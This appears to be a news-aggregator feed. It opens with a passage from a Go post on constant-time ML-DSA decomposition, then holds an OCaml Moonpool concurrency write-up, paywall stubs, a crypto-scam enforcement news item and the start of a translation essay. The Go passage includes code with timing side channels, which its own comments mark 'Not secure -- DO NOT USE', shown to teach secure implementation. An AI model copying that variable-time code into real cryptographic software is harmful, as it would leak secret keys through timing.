// Here, `alpha` is equal to `2 * γ2`, and `r` is the field element:
func DecomposeUnsafe(r, alpha int32) (r1, r0 int32) {
    // Ensure r is in range [0, q-1]
    r = r % q
    if r < 0 {
        r += q
    }

    // Center r around 0 (map to range [-(q-1)/2, (q-1)/2])
    if r > (q-1)/2 {
        r = r - q
    }

    // Compute r1 = round(r/alpha) where round is rounding to nearest
    // with ties broken towards zero
    if r >= 0 {
        r1 = (r + alpha/2) / alpha
    } else {
        r1 = (r - alpha/2 + 1) / alpha
    }

    // Compute r0 = r - r1*alpha
    r0 = r - r1*alpha

    // Adjust r1 if r0 is too large
    if r0 > alpha/2 {
        r1++
        r0 -= alpha
    } else if r0 < -alpha/2 {
        r1--
        r0 += alpha
    }

    return r1, r0
}

However, this violates cryptography engineering best practices:

  1. This code flagrantly uses division and modulo operators.
  2. It contains several branches based on values derived from the field element.

Zen and the art of branchless cryptography

The straightforward approach to preventing branches in any cryptography algorithm is to always perform both sides of the condition (true and false) and then use a constant-time conditional swap based on the condition to obtain the correct result. This involves bit masking, two’s complement, and exclusive OR (XOR).

Removing the branches from this function looks something like this:

// This is another AI-generated code sample.
// Not secure -- DO NOT USE.
func DecomposeUnsafeBranchless(r, alpha int32) (r1, r0 int32) {
    // Ensure r is in range [0, q-1]
    r = r % q
    r += q & (r >> 31) // Add q if r < 0 (using arithmetic right shift)

    // Center r around 0 (map to range [-(q-1)/2, (q-1)/2])
    mask := -((r - (q-1)/2 - 1) >> 31) // mask = -1 if r > (q-1)/2, else 0
    r -= q & mask

    // Compute r1 = round(r/alpha) with ties broken towards zero
    // For r >= 0: r1 = (r + alpha/2) / alpha
    // For r < 0:  r1 = (r - alpha/2 + 1) / alpha
    signMask := r >> 31                           // signMask = -1 if r < 0, else 0
    offset := (alpha/2) + (signMask & (-alpha/2 + 1)) // alpha/2 if r >= 0, else -alpha/2 + 1
    r1 = (r + offset) / alpha

    // Compute r0 = r - r1*alpha
    r0 = r - r1*alpha

    // Adjust r1 if r0 is too large (branch-free)
    // If r0 > alpha/2: r1++, r0 -= alpha
    // If r0 < -alpha/2: r1--, r0 += alpha

    // Check if r0 > alpha/2
    adjustUp := -((r0 - alpha/2 - 1) >> 31) // -1 if r0 > alpha/2, else 0
    r1 += adjustUp & 1
    r0 -= adjustUp & alpha

    // Check if r0 < -alpha/2
    adjustDown := -((-r0 - alpha/2 - 1) >> 31) // -1 if r0 < -alpha/2, else 0
    r1 -= adjustDown & 1
    r0 += adjustDown & alpha

    return r1, r0
}

That solves our conditional branching problem; however, we aren’t done yet. There are still the troublesome division operators.

Undivided by time: Division-free algorithms

The previous trick of constant-time conditional swaps can be leveraged to implement integer division in constant time as well.

func DivConstTime32(n uint32, d uint32) (uint32, uint32) {
    quotient := uint32(0)
    R := uint32(0)

    // We are dealing with 32-bit integers, so we iterate 32 times
    b := uint32(32)
    i := b
    for range b {
        i--
        R <<= 1

        // R(0) := N(i)
        R |= ((n >> i) & 1)

        // swap from Sub32() will look like this:
        // if remainder > d,  swap == 0
        // if remainder == d, swap == 0
        // if remainder < d,  swap == 1
        Rprime, swap := bits.Sub32(R, d, 0)

        // invert logic of sub32 for conditional swap
        swap ^= 1
        /*
            Desired:
                if R > D  then swap = 1
                if R == D then swap = 1
                if R < D  then swap = 0
        */

        // Qprime := Q
        // Qprime(i) := 1
        Qprime := quotient
        Qprime |= (1 << i)

        // Conditional swap:
        mask := uint32(-swap)
        R ^= ((Rprime ^ R) & mask)
        quotient ^= ((Qprime ^ quotient) & mask)
    }
    return quotient, R
}

This works as expected , but it’s slow, since it requires a full loop iteration to calculate each bit of the quotient and remainder. We can do better.

One neat optimization trick: Barrett reduction

Since the value $γ_2$ is fixed for a given parameter set, and the division and modulo operators are performed against $2γ_2$, we can use Barrett reduction with precomputed values instead of division.

Barrett reduction involves multiplying by a reciprocal (in our case, $2^{64}/2γ_2$) and then performing up to two corrective subtractions to obtain a remainder. The quotient is produced as a byproduct of this calculation.

// Calculates (n/d, n%d) given (n, d)
func DivBarrett(numerator, denominator uint32) (uint32, uint32) {
    // Since d is always 2 * gamma2, we can precompute (2^64 / d) and use it
    var reciprocal uint64
    switch denominator {
    case 190464: // 2 * 95232
        reciprocal = 96851604889688
    case 523776: // 2 * 261888
        reciprocal = 35184372088832
    default:
        // Fallback to slow division
        return DivConstTime32(numerator, denominator)
    }

    // Barrett reduction
    hi, _ := bits.Mul64(uint64(numerator), reciprocal)
    quo := uint32(hi)
    r := numerator - quo * denominator

    // Two correction steps using bits.Sub32 (constant-time)
    for i := 0; i < 2; i++ {
        newR, borrow := bits.Sub32(r, denominator, 0)
        correction := borrow ^ 1  // 1 if r >= d, 0 if r < d
        mask := uint32(-correction)
        quo += mask & 1
        r ^= mask & (newR ^ r)  // Conditional swap using XOR
    }

    return quo, r
}

With this useful function in hand, we can now implement Decompose without branches or divisions .

Toward a post-quantum secure future

The availability of post-quantum signature algorithms in Go is a step toward a future where internet communications remain secure, even if a cryptography-relevant quantum computer is ever developed.

If you’re interested in high-assurance cryptography, even in the face of novel adversaries (including but not limited to future quantum computers), contact our cryptography team today.

Moonpool and OCaml5 in Imandrax

Lobsters
docs.imandra.ai
2025-11-14 15:20:53
Comments...
Original Article

by Simon Cruanes ( @c-cube ) on nov 12, 2025.

Introduction

OCaml 5.0 was released on December 2022 , with exciting new features for concurrency in OCaml. 1 The community reacted, as befits OCaml, by starting multiple new concurrency libraries such as Eio , Miou , picos , Domainslib , Abb (announce) , and my (@c-cube) own library, Moonpool .

In this essay blog post I will explain how we use Moonpool at Imandra in our next-generation proof assistant, imandrax .

Imandrax is a proprietary proof assistant and automated prover that underpins much of our internal operations. It is based on a pure subset of OCaml and combines techniques from the Boyer-Moore world (as seen in ACL2 ) and SMT solvers , in our case using Z3 via its OCaml bindings. Imandrax can be used either from the command line; from an editor using its integrated Language Server (LSP) ; or via a HTTP API for programmatic use. For context, the project clocks at around 108 kloc of OCaml even before considering dependencies. Below is a screenshot of our VSCode plugin, showing a simple proof in imandrax.

A screenshot of VScode with a proof

With that out of the way, 2 let’s talk about concurrency and parallelism in OCaml and then in imandrax!

Brief overview of concurrency in OCaml 4.xx

Historically, concurrency in OCaml 4.xx and earlier was done in one of the following ways:

  • System threads, but with a GIL-like runtime lock which prevents two threads from running in parallel (unless one of them is inside a lock-releasing C call). This means only one core can be used by a given process, and it also often means using blocking IO primitives. In OCaml it could look like this:

      let handle_client (input:in_channel) (output:out_channel) : unit =
        try
          while true do
            let line = input_line input in
            Printf.printf "read %S from client.\n" line;
            output_line output (String.uppercase_ascii line)
          done
        with End_of_file -> ()
    
      (* in the server accept loop *)
      let th: Thread.t = Thread.create (fun () -> handle_client input output) ()
    
  • Cooperative concurrency via Lwt or Janestreet’s Async . This style builds on some system event loop ( epoll , kqueue , etc) to schedule promises, and provides a concurrency monad to chain the promises together. It unlocks asynchronous IOs and can potentially enable higher levels of concurrency than plain threads, but it’s still limited to a single core and can lead to some interesting bugs if an expensive CPU-bound task runs in the event loop.

    The monadic style would look like this (some error handling omitted):

      let rec handle_client input output : unit Lwt.t =
        Lwt_io.read_line_opt input >>= fun line_opt ->
        match line_opt with
        | None -> Lwt.return () (* done *)
        | Some line ->
          Lwt_io.write_line output (String.uppercase_ascii line) >>= fun () ->
          handle_client input output
    

    There are preprocessors and other ways to prettify the code, but ultimately this is what the code is like. Among other downsides, stack traces are completely useless for exceptions raised from Lwt programs.

The most active web framework for OCaml, Dream , is based on Lwt 3 and thus, on Linux, on epoll .

Direct-style concurrency on OCaml5

With OCaml5 and effects we’re seeing direct style concurrency rise through the use of algebraic effects . This means, in effect, no more concurrency monad: instead of chaining because some form of await can be used to suspend the current fiber/task until a promise is resolved.

Eio: Lwt’s replacement?

The most popular OCaml5 concurrency library is probably Eio which provides lightweight fibers on top of an event loop ( epoll , io_uring , kqueue , etc).

An example taken directly from the README:

# let main _env =
  Fiber.both
    (fun () -> for x = 1 to 3 do traceln "x = %d" x; Fiber.yield () done)
    (fun () -> for y = 1 to 3 do traceln "y = %d" y; Fiber.yield () done) ;;

# Eio_main.run main
+x = 1
+y = 1
+x = 2
+y = 2
+x = 3
+y = 3
- : unit = ()

Here we see that two distinct fibers (lightweight cooperative tasks) are started concurrently. Each of them, in a loop, prints a message, and yields to the scheduler, thus allowing the other fiber to have a turn.

Further down in the README we see:

let cli ~stdin ~stdout =
  let buf = Eio.Buf_read.of_flow stdin ~initial_size:100 ~max_size:1_000_000 in
  while true do
    let line = Eio.Buf_read.line buf in
    traceln "> %s" line;
    match line with
    | "h" | "help" -> Eio.Flow.copy_string "It's just an example\n" stdout
    | x -> Eio.Flow.copy_string (Fmt.str "Unknown command %S\n" x) stdout
  done

It’s clearly direct style: a while loop, IO operations resemble normal function calls, no monad in sight, stack traces are nice and pretty. Eio normally still runs on a single thread, even though it has some facilities to manage a domain pool for background tasks.

This is not intended as a full introduction to Eio, but we can mention a few more things before moving on:

  • it is very opinionated and forces users to thread a set of capabilities around IO operations. The 0.1 announce spilled a lot of ink on that topic.
  • it implements structured concurrency . See Trio for a very readable overview of this neat topic.
  • it defaults to io_uring on Linux.
  • it has a neat tracing system based on OCaml’s new Runtime_events system.

Domains

A subtle aspect of OCaml5’s new support for multicore programming is that there’s both the pre-existing threads and the new concept of domains . The go-to library for domain-based parallelism is domainslib .

Domains are heavier threads that have their own slice of runtime and can actually run in parallel. Each domain might have multiple threads that share its runtime slice and cannot run in parallel of one another.

It is recommended to not have more domains than CPU cores. This makes domains a very scarce resource, unlike threads, and it means it can be bad practice for a library to start domains unilaterally.

Moonpool

So where does Moonpool fit in this landscape? Moonpool was designed to bypass the lack of compositionality of domains, by allowing multiple thread pools to co-exist while spreading their threads over multiple domains. Moonpool was first released in june 2023 ( initial announce for its 0.1 ) under the MIT license, and has been continuously developed since. The development was driven in no small part by our use of it in imandrax.

The core concept of Moonpool is Moonpool.Runner.t , alongside a promise type 'a Moonpool.Fut.t . Here is a very simplified view of Moonpool’s main interface: ( read docs here )

(** thread-safe promises *)
module Fut : sig
  type 'a t
  (** a promise returning a ['a] *)

  val await : 'a t -> 'a
  (** suspend the caller task until promise is resolved,
      then get the promise's result. *)

  val make : unit -> 'a t

  val fulfill : 'a t -> 'a -> unit
end

(** A task to run on a thread pool *)
type task = unit -> unit

(** The interface for runners *)
module Runner : sig
  type t = {
    run_async: task -> unit;
    shutdown: unit -> unit;
    size: unit -> int;
    num_tasks: unit -> int;
  }
end

(** runs a task on the given pool *)
val run_async : Runner.t -> task -> unit

(** spawn a task on the given pool, returning a promise *)
val spawn : Runner.t -> (unit -> 'a) -> 'a Fut.t

(** create a new work stealing pool *)
val ws_pool : ?num_threads:int -> unit -> Runner.t

So the user can create one or more pools (the type Runner.t ) of worker threads, and then run task s on them, either with run_async or spawn . These workers are preemptive, not cooperative, based on Thread.t . It’s fine to have hundreds of workers spread among multiple pools even on a 16 core machine, which means you can have multiple pools without having to worry about exceeding 16 workers like you’d do if they used a full domain.

There is currently no dedicated IO facility, the focus is on CPU heavy tasks.

To summarize some of the design points:

  • explicit Runner.t interface, so it’s possible to choose on which pool a particular task runs, and have multiple possible implementations of such runners;
  • use OCaml5’s effects to be able to await a promise, provide parallel primitives, etc. without monadic contamination and while preserving stack traces;
  • the promises are thread safe and can be await ed from other runners safely. Promises come from picos , an attempt at defining common foundations for the various multicore libraries in the interest of cross-compatibility.

More on the design and goals of Moonpool can be found on the initial release announce over discuss .

An example with Moonpool: basic approximation of π

One of the basic benchmarks in Moonpool computes a (simple) approximation of pi using floats. The parallel approach leads to a 11x speedup on my Intel i7-12700, with a variant of the code below.

Code for computing a float approximation of pi. ```ocaml (* sequential version: *) let run_sequential (num_steps : int) : float = let@ _trace_span = Trace.with_span ~__FILE__ ~__LINE__ "pi.seq" in let step = 1. /. float num_steps in let sum = ref 0. in for i = 0 to num_steps - 1 do let x = (float i +. 0.5) *. step in sum := !sum +. (4. /. (1. +. (x *. x))) done; let pi = step *. !sum in pi (* parallel version using fork-join over some Moonpool runner, via a "parallel for" primitive *) let run_fork_join num_steps : float = let@ pool = Moonpool.Ws_pool.with_ () in let num_tasks = Ws_pool.size pool in let step = 1. /. float num_steps in let global_sum = Lock.create 0. in (* start a task on the pool and block until it's done *) Ws_pool.run_wait_block pool (fun () -> (* parallel for, running on the pool and await-ing the subtasks *) Moonpool_forkjoin.for_ ~chunk_size:(3 + (num_steps / num_tasks)) num_steps (fun low high -> let sum = ref 0. in for i = low to high do let x = (float i +. 0.5) *. step in sum := !sum +. (4. /. (1. +. (x *. x))) done; let sum = !sum in Lock.update global_sum (fun n -> n +. sum))); let pi = step *. Lock.get global_sum in pi ```

And hyperfine tells us:

  ./_build/default/benchs/pi.exe -n 100_000_000 -mode forkjoin -kind=pool ran
   11.07 ± 1.36 times faster than ./_build/default/benchs/pi.exe -n 100_000_000 -mode=seq

Moonpool in imandrax

Right, so, where were we? We were talking about imandrax, a proof assistant with a heavy focus on proof automation.

The motivation for all this elaborate thread pool dance is simple: proof automation is really CPU heavy, and we wanted to run it in background tasks. In 2025, blocking the whole REPL because we’re asking Z3 to find a counter-model feels suboptimal. Even worse would be to block the LSP server and render it unresponsive while we check theorems in the current editor buffer, or to block the whole HTTP server while processing an API call!

So, we use Moonpool to run most of the non-trivial computations in thread pools.

  • In a large portion of the codebase, a Moonpool.Runner.t is in scope so it can be used to accelerate basic computations. Such tasks include, among others:
    • (de)compressing a list of blobs using zlib , using fork-join to parallelize the work
    • traversing the user’s project tree to find dune files (we walk the directory tree in parallel, one task per sub-directory)
    • various other parallel graph traversals (e.g. computing dependencies between content-addressed serialized values)
  • Parsing, typechecking, and the initial computation of proof obligations (“POs”) is done with file-level parallelism. If we check file d.iml and it imports files a.iml , b.iml , and c.iml , we will parse and typecheck these in parallel background tasks. This becomes more impactful for larger developments with many files.
  • LSP queries are processed in their individual tasks in a dedicated thread pool, which is kept separate from the normal background-task pool.
  • for the HTTP server, we currently spawn a thread per connection because some of them might be long lived. HTTP isn’t currently a bottleneck for us.
  • The main function still runs in a (trivial) Moonpool runner: we call Moonpool_fib.main the_real_main 4 and it calls the_real_main immediately. The point of this is that it installs effect handlers so that we can call Moonpool.Fut.await from within the main function, too.

Here’s a trace of an execution of imandrax-cli (visualized with perfetto , produced using heavy ocaml-trace instrumentation)

perfetto trace

  • on the left, the thin pink bands are the initial traversal of the source directory to look for dune files.
  • on the right, the selected blue area contains a bunch of tasks that decompress zlib blobs and perform some Blake3 hashing for content-addressing purposes. 5
  • in the center, the parsing, typechecking and subsequent computation of POs for two modules. It’s sequential because each PO depends on the previous one.

Here’s a trace of parallel typechecking and PO computation in the LSP server, after opening a large development in VSCode:

perfetto trace for the LSP

Some tasks are still very sequential! But do note that tasks on the left being spread between multiple worker threads. We also have parallel compression on the right (the green bands). The LSP server also uses background tasks for parallel parsing, LSP query handling, etc.

Running the proof obligations

Funnily enough, we started using Moonpool for a use case that’s not served by it anymore: actual theorem proving.

The heavy computations associated with theorem proving (Boyer-Moore style waterfall, SMT solving, simplifications, rewriting, etc.) used to run directly on a thread pool, but now run in worker sub-processes.

There’s multiple reasons for that. Z3 OCaml bindings are fiddly and might leak memory, or, even worse, segfault. Enforcing timeouts can be tricky. It makes sense to isolate the heavy lifting in a disposable sub-process so that crashes or leaks don’t affect the main imandrax process. Once the sub-process dies, the OS cleans up.

Here is a trace obtained by running the imandrax cli on a problem:

trace with multiple worker processed

We can see the thin long blue line, that’s the main process. The other lines are individual worker processes that it spawned. Each worker has its own small thread pool for basic concurrency needs. Some workers can live for a while.

Parallelization levels

Running tasks in parallel doesn’t simply measure Moonpool’s performance, because we do solve proof obligations in worker subprocesses. Here we see that with at most 8 worker processes at a time, imandrax manages to use 8.2 CPU cores on a decomposition task.

$ perf stat ./_build/default/src/cli/imandrax_cli.exe check test/iml/decomp.iml -j 8
Success: 59/59 POs succeeded.

 Performance counter stats for './_build/default/src/cli/imandrax_cli.exe check test/iml/decomp.iml -j 8':

    31,831,740,539      task-clock:u                     #    8.248 CPUs utilized
    […]

       3.859512934 seconds time elapsed

Moonpool’s influence on the codebase

So, that’s how we use Moonpool as the foundation for concurrency in imandrax. Since the previous system was REPL-based and sequential, we had opportunity to learn a lot by experimenting with this new world of direct-style concurrency. (…new in OCaml, anyway)

Over time, we’ve converged on some useful patterns. They might not be universally applicable but they do work for us. Some of them are well known! Here’s a few:

Local mutation, immutable long-lived data.

Data that is serialized, passed to other tasks, kept for a long time, etc. is immutable in most cases. We don’t want to needlessly worry about race conditions.

On the other hand, when processing a single task, we use a lot of mutations, probably more than the average OCaml program. We just make sure they don’t escape 😁.

Runners are passed explicitly

A lot of the code is passed some sort of context or state (a record with… stuff). It often includes a Moonpool.Runner.t for concurrency needs. There is not much global state, and no global runner.

Switches

We have a Switch.t type that’s loosely inspired by Lwt_switch.t .:

type t [@@deriving show]
(** A thread-safe switch for cancellation *)

val create : ?parent:t -> unit -> t
(** New switch.
    @param parent
      inherit from this switch. It means that the result switches off if the
      parent does, but conversely we can turn the result off without affecting
      the parent. In other words, this switch's lifetime is a subset of the
      parent's lifetime *)

val on_turn_off : t -> (unit -> unit) -> unit
(** [on_turn_off sw f] will call [f()] when [sw] is turned off. If [sw] is
    already off then [f()] is called immediately. {b NOTE} [f] really should not
    fail. *)

val is_on : t -> bool
val is_off : t -> bool

val turn_off : t -> unit
(** If it was on, turn the switch off and call all the callbacks. *)

We pass this around in much of the code base as an ~(active:Switch.t) parameter, or as part of a larger context record. Resources can be registered for cleanup on the current switch (useful in a concurrent context where RAII-ish isn’t always suitable).

In CPU-bound tasks, it is on us to regularly check that the switch is on, and exit early if it’s off. Cancellation is a hard problem!

Compute/IO segregation

We try to reduce the amount of “shotgun IOs” we do. A worker subprocess, responsible for processing one (1) task, will thus:

  • read the entirety of the serialized task and its (bundled) dependencies, from the parent process, on stdin . The parent process already took care of the bundling so we don’t have to do a back and forth.
  • deserialize the task description into usable logic structures.
  • actually process the task, calling Z3, running a refinement loop, inductive waterfall, etc. where all the magic happens. The only IO we do here is sending progress updates to the parent, logging, and tracing.
  • serialize results.
  • write serialized results on stdout for the parent to read.

RAII-ish

This is a bit of OCaml inside-baseball. For safe resource handling, we often adopt this pattern:

(* [let@ x = e1 in e2] is the same as [e1 (fun x -> e2)] *)
let (let@) = (@@)

(* look at this cleanup! *)

let example1 =
  let@ input = CCIO.with_file_in "foo.txt" in
  process input
(* file handle closed here *)

let example2 =
  (* acquire a DB connection from a pool *)
  let@ db_conn = Db_pool.with_connection db_pool in
  (* run a query using the connection *)
  run_sql db_conn "select a, b from whatever;"
(* DB connection returned to pool here, at scope exit *)

It works surprisingly well to make sure we don’t leak resources, as long as the resources’ lifetimes are purely lexical in scope. We use this for locks, tracing spans, error handlers, database connections, client sockets, etc.

RAII-ish Lock

Whenever we have actual shared data (some tables in parallel graph traversals, etc.) we use this small mutex wrapper:

module Lock = struct
  type 'a t = {
    mutex: Mutex.t;
    mutable content: 'a;
  }

  let create content : _ t = { mutex = Mutex.create (); content }

  let with_lock (self:_ t) f =
    Mutex.protect self.mutex (fun () -> f self.content)
end

let my_tbl: (int,bool) Hashtbl.t Lock.t =
  Lock.create @@ Hashtbl.create 32

let some_task () =
  (* RAII-ish, as above *)
  let@ tbl = Lock.with_lock my_tbl in
  Hashtbl.add tbl "cool" true
(* lock released here *)

We also have a similar wrapper called 'a Immlock.t , designed for immutable values only. It’s a bit like a generalized 'a Atomic.t value. The read path is a single atomic read, whereas the update path uses a regular lock to serialize writers. Writers don’t block readers, which will just read the current value. Since our long lived values tend to be immutable, a 'a Immlock.t can be used for intermediate computations, only for its content to be returned as-is at the end.

(* immlock.ml*)

type 'a t = {
  content: 'a Atomic.t;  (** Quickly access immutable data *)
  mutex: Mutex.t;  (** only used for updates *)
}

let[@inline] get self = Atomic.get self.content

let update self f =
  Mutex.protect self.mutex (fun a ->
    let res = f (Atomic.get a) in
    Atomic.set self.content res)

let update_map self f =
  Mutex.protect self.mutex (fun a ->
    let res, y = f (Atomic.get a) in
    Atomic.set self.content res;
    y)

Critical sections

Talking about locks, you know what’s bad ? Holding a lock across an await . Don’t do it. That’s it.

In general, critical sections (the scope inside let@ foo = Lock.with_lock locked_foo in … ) must be as short and side-effect free as possible.

Thread-local storage

There still isn’t any official support for thread-local storage in OCaml despite various past attempts . I think it’s pretty unfortunate but meanwhile there’s a workaround implemented in a library . It has worked fine for us in various places in Moonpool, but it would be better to have official support in the long term.

Case study: Parse_import_graph

This might all be a bit abstract. We should look at an illustrative example of what our use of Moonpool looks like in practice . Imandrax has an in-file import syntax (instead of relying on a build system like OCaml does. The syntax is, in the most basic case, [@@@import "foo/bar.iml"] .

There are situations where we want to parse a file and transitively find all its dependencies, each resolved into Abspath.t values (absolute, normalized file paths). A slightly simplified version of the implementation for that feature goes like this:


(** Imports for a given file *)
type per_file = {
  imports: Import.t list; (** Resolved imports for this file *)
  import_errors: (T_loc.t * Error.t) list; (** Import errors, with locations *)
}
[@@deriving show]

(** Result of analyzing the transitive import graph *)
type t = {
  files: per_file Abspath.Map.t;
  files_not_found: Str_set.t;
}

(** Internal state for the computation *)
type state = {
  active: Switch.t;
  runner: Moonpool.Runner.t;
  not_found: Str_set.t Immlock.t;
  files: per_file Abspath.Map.t Immlock.t;
  files_seen: Abspath.Set.t Immlock.t;
}

(** Graph traversal *)
let rec analyze_file (self : state) (p : Abspath.t) : unit Moonpool.Fut.t =

  (* closure to actually parse file at path [p], in a background task *)
  let actually_run () : unit Moonpool.Fut.t =
    let@ () = Moonpool.Fut.spawn ~on:self.executor in
    let@ _trace_span =
      Trace_async.with_span ~level:Info ~__FILE__ ~__LINE__
        "parse-import.analyze-file"
        ~data:(fun () -> [ "path", `String (p :> string) ])
    in

    if Switch.is_off self.active then
      Error.failf ~kind:Error_kind.interrupted "Interrupted.";

    (* the actual parsing *)
    let phrases, _, _ = Parsing.parse_file ~path:p () in
    let imports, import_errors = Parsing.imports_of_phrases phrases in

    (* save result *)
    let per_file = { imports; import_errors } in
    Immlock.update self.files (Abspath.Map.add p per_file);

    (* analyze imports in sub-tasks, in parallel,
       and wait for them to terminate *)
    List.map
      (fun (imp : Import.t) ->
        analyze_file self (imp.import_abs_path :> Abspath.t))
      imports
    |> List.iter Moonpool.Fut.await
  in

  let already_processed =
    (* atomically check if we're the first task to check this file,
        and if so add it to the set of processed files *)
    Immlock.update_map self.files_seen (fun s ->
        Abspath.Set.add p s, Abspath.Set.mem p s)
  in

  if already_processed then
    Moonpool.Fut.return ()  (* no-op *)
  else
    actually_run ()

let run ~active ~runner ~(file : Abspath.t) () : t Error.result =
  (* catch errors, returns results *)
  let@ () = Error.guards "parsing import graph" in
  let@ _trace_span =
    Trace.with_span ~__FILE__ ~__LINE__ "parse-import-graph.main"
  in

  let st : state = {
    active;
    runner;
    not_found = Immlock.create Str_set.empty;
    files = Immlock.create Abspath.Map.empty;
    files_seen = Immlock.create Abspath.Set.empty;
  } in

  analyze_file st file |> Moonpool.Fut.await;
  {
    files_not_found = Immlock.get self.not_found;
    files = Immlock.get self.files;
  } in

As we can see, the graph traversal relies on Fut.spawn to explore the dependencies of the current file in parallel, it has some shared state that relies on Immlock.t (to make sure we don’t explore a file more than once), there’s a layer of tracing using ocaml-trace , and a basic form of cancellation handling using a Switch.t .

This version doesn’t warn the user upon cyclic dependencies but we do check for that at typechecking.

What about async IOs?

I’ll keep this section relatively short. The gist is: we still currently use blocking IOs as our system is generally CPU-bound. For HTTP handlers, we spawn a thread (some HTTP endpoints use a websocket, potentially long lived, which would quickly starve a thread pool.) For local file IOs and the LSP, threads are more than enough.

Still, we are experimenting with Moonpool_lwt (announced here ), a Moonpool.Runner.t that runs on, and wraps, Lwt_main.run . It is compatible with all the Moonpool concurrency primitives we use (including await -ing futures that run on the various background thread pools), but also await -ing any Lwt.t promise, such as IO primitives that are handled by the Lwt event loop (backed by epoll on Linux.) We could also use any Lwt-based library such as Dream, but still write each HTTP handler in direct style.

We’re not using Eio mostly because it’s not (yet?) compatible with Moonpool, and is an opinionated large library in itself. Our initial needs were driven by parallelization, not something Eio was designed for.

Conclusion

That was quite a lot! It’s great to finally have multicore support in OCaml, but the ecosystem and best practices around it are still solidifying, and various people and groups are exploring alternative libraries and approaches. For us, Moonpool has been working fairly well.

[$] A struct sockaddr sequel

Linux Weekly News
lwn.net
2025-11-14 15:10:05
One of the many objectives of the Linux Kernel Self-Protection Project (KSPP), which just completed ten years of work, is to ensure that all array references can be bounds-checked, even in the case of flexible array members, the size of which is not known at compile time. One of the most challengin...
Original Article

The page you have tried to view ( A struct sockaddr sequel ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 4, 2025)

Oracle hit hard in Wall Street's tech sell-off over its AI bet

Hacker News
www.ft.com
2025-11-14 15:04:22
Comments...
Original Article

Subscribe to unlock this article

Try unlimited access

Only $1 for 4 weeks

Then $75 per month. Complete digital access to quality FT journalism on any device. Cancel anytime during your trial.

Explore our full range of subscriptions.

For individuals

Discover all the plans currently available in your country

For multiple readers

Digital access for organisations. Includes exclusive features and content.

Why the FT?

See why over a million readers pay to read the Financial Times.

Find out why

US announces new strike force targeting Chinese crypto scammers

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 14:54:30
U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. [...]...
Original Article

Cryptocurrency

U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually.

The Scam Center Strike Force team, supported by agents from the U.S. Attorney's Office, the Department of Justice, the FBI, and the Secret Service, investigates and prosecutes criminal groups operating large-scale cryptocurrency investment scams (also known as pig butchering or romance baiting ) and money laundering campaigns from criminal compounds across Southeast Asia.

The strike team focuses on tracing illicit funds, seizing scammers' cryptocurrency, and coordinating with international partners to dismantle the infrastructure supporting their operations.

Wiz

Chinese transnational criminal rings behind these scams use social media and text messages to gain victims' trust before tricking them into transferring cryptocurrency into fraudulent investment platforms.

The scammers often work from compounds in Cambodia, Laos, and Burma, where workers are frequently victims of human trafficking, held against their will, and forced to target potential victims worldwide. In some countries where these compounds are based, scam-generated revenue often accounts for nearly half the nation's gross domestic product (GDP), the Justice Department said.

"Scam centers are creating a generational wealth transfer from Main Street America into the pockets of Chinese organized crime," U.S. Attorney Jeanine Ferris Pirro stated . "As the prosecuting office in the nation’s capital, my office has the authority to charge foreign defendants and seize foreign property."

"In fiscal year 2025 alone, the U.S. Secret Service has responded to approximately 3,000 victims who contacted us regarding cryptocurrency investment schemes," added Assistant Director Kyo Dolan of the United States Secret Service.

$401 million in cryptocurrency already seized

While the strike force has just been announced, it has already seized over $401 million in cryptocurrency and filed forfeiture proceedings for an additional $80 million in stolen funds. The strike force's Burma team has also seized websites and is now seeking warrants to seize satellite terminals used for money laundering and other forms of fraud.

On Wednesday, the Treasury Department’s Office of Foreign Assets Control imposed sanctions on the armed group Democratic Karen Benevolent Army (DKBA) and four of its senior leaders for running cyber-scam operations in Burma that specifically target U.S. citizens.

It also sanctioned Thailand-based firms Trans Asia International Holding Group Thailand Company Limited and Troth Star Company Limited, as well as Thai national Chamu Sawang, all linked to Chinese criminal rings that finance the DKBA's operations.

Under the sanctions, the assets of designated entities and individuals are now blocked, and U.S. individuals and organizations are barred from dealing with them, which may also expose them to potential sanctions.

Earlier this year, OFAC also sanctioned the Karen National Army (KNA) and twelve other companies based in Cambodia and Burma (and associated individuals) for their involvement in human trafficking and cyber scams.

In October, the U.S. Department of Justice seized $15 billion in bitcoin from the leader of Prince Group, a criminal organization that stole billions from Americans through cryptocurrency investment scams.

"A U.S. government estimate indicated that Americans lost at least $10 billion to Southeast Asia-based scam operations in 2024, a 66 percent increase over the prior year, with scams like those perpetrated by Prince Group TCO being particularly significant," OFAC noted.

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Linear Algebra Explains Why Some Words Are Effectively Untranslatable

Hacker News
aethermug.com
2025-11-14 14:46:27
Comments...
Original Article

A part of me still hasn't recovered from learning that some people believe there is no such thing as an untranslatable word. I've written about why I disagree before , but that explanation didn't satisfy me completely. There was a stronger argument to be made, I thought, but I couldn't put it into words. Now I remember, though: you need to see language as (a little bit) like math. Call me crazy, but I think that language translation is like a change of basis in linear algebra.

Me making weird connections like this might simply be an occupational hazard. Both my PhD research and my first job had to do with controlling the position and orientation of spacecraft and rocks in space, which means that I spent years juggling vectors, matrix multiplications, and reference frames almost daily. Still, I think it is simple enough to be understood by anyone, so hear me out.

( You might remember linear algebra from high school. It's that subfield where you write about stuff like this:

M = [ 1 0 0 2 1 0 3 3 1 ] ( x y ) M = \begin{bmatrix} 1 & 0 & 0 \\ 2 & 1 & 0 \\ 3 & 3 & 1 \end{bmatrix} \begin{pmatrix} x \\ y \end{pmatrix}

If the mere sight of the above is like a punch in the face for you, don't worry. I'm not going to math you to death in what follows. I will only remind you of a tiny basic part of it that I think relates to languages.)

During those same mathematical days, I was also learning Japanese. The language fascinated me for many reasons, like its beautiful dissociation between written and spoken words and its many unique quirks , but I was also struck early on by something a bit more meta: how hard it is to translate things to and from it.

